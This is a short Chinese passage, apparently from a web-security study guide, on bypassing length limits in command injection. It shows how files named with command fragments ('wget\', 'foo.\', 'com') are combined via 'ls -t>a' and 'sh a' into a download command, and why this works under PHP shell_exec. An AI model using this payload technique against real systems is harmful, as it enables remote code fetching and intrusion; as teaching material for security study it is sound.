4.5. 命令注入¶
4.5.5.3. 长度限制绕过¶
>wget\
>foo.\
>com
ls -t>a
sh a
上面的方法为通过命令行重定向写入命令,接着通过ls按时间排序把命令写入文件,最后执行
直接在Linux终端下执行的话,创建文件需要在重定向符号之前添加命令
这里可以使用一些诸如w,[之类的短命令,(使用ls /usr/bin/?查看)
如果不添加命令,需要Ctrl+D才能结束,这样就等于标准输入流的重定向
而在php中 , 使用 shell_exec 等执行系统命令的函数的时候 , 是不存在标准输入流的,所以可以直接创建文件